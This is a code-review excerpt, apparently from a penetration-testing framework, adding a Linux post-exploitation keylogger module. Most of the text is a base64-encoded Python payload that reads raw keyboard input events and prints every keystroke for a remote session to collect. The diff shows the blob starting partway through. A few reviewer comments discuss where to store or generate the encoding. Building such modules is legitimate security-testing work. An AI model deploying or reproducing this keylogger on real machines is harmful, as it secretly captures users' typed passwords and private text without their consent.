modules/post/linux/gather/keylogger.rb

```diff
@@ -0,0 +1,67 @@
HMgPSBbCiAgICAiUkVTRVJWRUQiLAogICAgIkVTQyIsCiAgICAiMSIsCiAgICAiMiIsCiAgICAiMyIsCiAgICAiNCIsCiAgICAiNSIsCiAgICAiNiIsCiAgICAiNyIsCiAgICAiOCIsCiAgICAiOSIsCiAgICAiMCIsCiAgICAiTUlOVVMiLAogICAgIkVRVUFMIiwKICAgICJCQUNLU1BBQ0UiLAogICAgIlRBQiIsCiAgICAiUSIsCiAgICAiVyIsCiAgICAiRSIsCiAgICAiUiIsCiAgICAiVCIsCiAgICAiWSIsCiAgICAiVSIsCiAgICAiSSIsCiAgICAiTyIsCiAgICAiUCIsCiAgICAiTEVGVEJSQUNFIiwKICAgICJSSUdIVEJSQUNFIiwKICAgICJFTlRFUiIsCiAgICAiTEVGVENUUkwiLAogICAgIkEiLAogICAgIlMiLAogICAgIkQiLAogICAgIkYiLAogICAgIkciLAogICAgIkgiLAogICAgIkoiLAogICAgIksiLAogICAgIkwiLAogICAgIlNFTUlDT0xPTiIsCiAgICAiQVBPU1RST1BIRSIsCiAgICAiR1JBVkUiLAogICAgIkxFRlRTSElGVCIsCiAgICAiQkFDS1NMQVNIIiwKICAgICJaIiwKICAgICJYIiwKICAgICJDIiwKICAgICJWIiwKICAgICJCIiwKICAgICJOIiwKICAgICJNIiwKICAgICJDT01NQSIsCiAgICAiRE9UIiwKICAgICJTTEFTSCIsCiAgICAiUklHSFRTSElGVCIsCiAgICAiS1BBU1RFUklTSyIsCiAgICAiTEVGVEFMVCIsCiAgICAiU1BBQ0UiLAogICAgIkNBUFNMT0NLIiwKICAgICJGMSIsCiAgICAiRjIiLAogICAgIkYzIiwKICAgICJGNCIsCiAgICAiRjUiLAogICAgIkY2IiwKICAgICJGNyIsCiAgICAiRjgiLAogICAgIkY5IiwKICAgICJGMTAiLAogICAgIk5VTUxPQ0siLAogICAgIlNDUk9MTExPQ0siCl0KCiMgSnVzdCBmb3Igc29tZSBwcmV0dHkgcHJpbnRpbmcgcHVycG9zZXMKc2hpZnQgPSBGYWxzZQptb2RpZmllcnMgPSBbCiAgICAiTEVGVFNISUZUIiwKICAgICJSSUdIVFNISUZUIiwKICAgICJMRUZUQ1RSTCIsCiAgICAiTEVGVEFMVCIKXQpwcmVzc2VkID0gW10KCiNsb25nIGludCwgbG9uZyBpbnQsIHVuc2lnbmVkIHNob3J0LCB1bnNpZ25lZCBzaG9ydCwgdW5zaWduZWQgaW50CkZPUk1BVCA9ICdsbEhISScKRVZFTlRfU0laRSA9IHN0cnVjdC5jYWxjc2l6ZShGT1JNQVQpCgojb3BlbiBmaWxlIGluIGJpbmFyeSBtb2RlCmluX2ZpbGUgPSBvcGVuKGluZmlsZV9wYXRoLCAicmIiKQoKd2hpbGUgMToKICAgIGV2ZW50ID0gaW5fZmlsZS5yZWFkKEVWRU5UX1NJWkUpCiAgICAKICAgICh0dl9zZWMsIHR2X3VzZWMsIHR5cGUsIGNvZGUsIHZhbHVlKSA9IHN0cnVjdC51bnBhY2soRk9STUFULCBldmVudCkKCiAgICBpZiAodHlwZSA9PSAxKSBhbmQgKHZhbHVlID09IDEgb3IgdmFsdWUgPT0gMCkgOgogICAgICAgIGtleSA9ICJ1bmtub3duICglZCkiICUgY29kZQogICAgICAgIGlmIGNvZGUgPCBsZW4oa2V5bWFwcykgYW5kIGtleSA+PSAwOgogICAgICAgICAgICBrZXkgPSBrZXltYXBzW2NvZGVdCgogICAgICAgIGlmIGxlbihrZXkpID09IDEgYW5kIHZhbHVlID09IDE6CiAgICAgICAgICAgIGlmIG5vdCBzaGlmdDoga2V5ID0ga2V5Lmxvd2VyKCkKCiAgICAgICAgICAgIHRvX3ByaW50ID0gIiIKICAgICAgICAgICAgZm9yIG1vZGlmaWVyIGluIHByZXNzZWQ6CiAgICAgICAgICAgICAgICB0b19wcmludCArPSBtb2RpZmllciArICIgIgogICAgICAgICAgICBwcmludCh0b19wcmludCArIGtleSkKICAgICAgICBlbGlmIGtleSBpbiBtb2RpZmllcnM6CiAgICAgICAgICAgIGlmIHZhbHVlID09IDA6CiAgICAgICAgICAgICAgICBpZiBrZXkgPT0gIlJJR0hUU0hJRlQiIG9yIGtleSA9PSAiTEVGVFNISUZUIjoKICAgICAgICAgICAgICAgICAgICBzaGlmdCA9IEZhbHNlCiAgICAgICAgICAgICAgICBlbHNlOgogICAgICAgICAgICAgICAgICAgIHByZXNzZWQucmVtb3ZlKGtleSkKICAgICAgICAgICAgZWxpZiB2YWx1ZSA9PSAxOgogICAgICAgICAgICAgICAgaWYga2V5ID09ICJSSUdIVFNISUZUIiBvciBrZXkgPT0gIkxFRlRTSElGVCI6CiAgICAgICAgICAgICAgICAgICAgc2hpZnQgPSBUcnVlCiAgICAgICAgICAgICAgICBlbHNlOgogICAgICAgICAgICAgICAgICAgIHByZXNzZWQuYXBwZW5kKGtleSkKICAgICAgICBlbGlmIHZhbHVlID09IDAgYW5kIGtleSBub3QgaW4gbW9kaWZpZXJzIGFuZCBsZW4oa2V5KSA+IDE6CiAgICAgICAgICAgIHByaW50KGtleSkKCiAgICAjIE1ha2VzIHN1cmUgbWV0dGxlIHJlYWRzIG91ciBvdXRwdXQKICAgIHN5cy5zdGRvdXQuZmx1c2goKQoKaW5fZmlsZS5jbG9zZSgpCg=='.decode('base64')\""
```

Comment:
I think having this base64 blob in a file in `data/post/` so that it could be generated with one command from the source file would make this file much easier to read.

Reply:
Would it be better to base64 encode the file `external/source/linux/keylogger.py` on the fly rather than store both the source and the base64 encoded version on disk?

Reply:
That could work as well.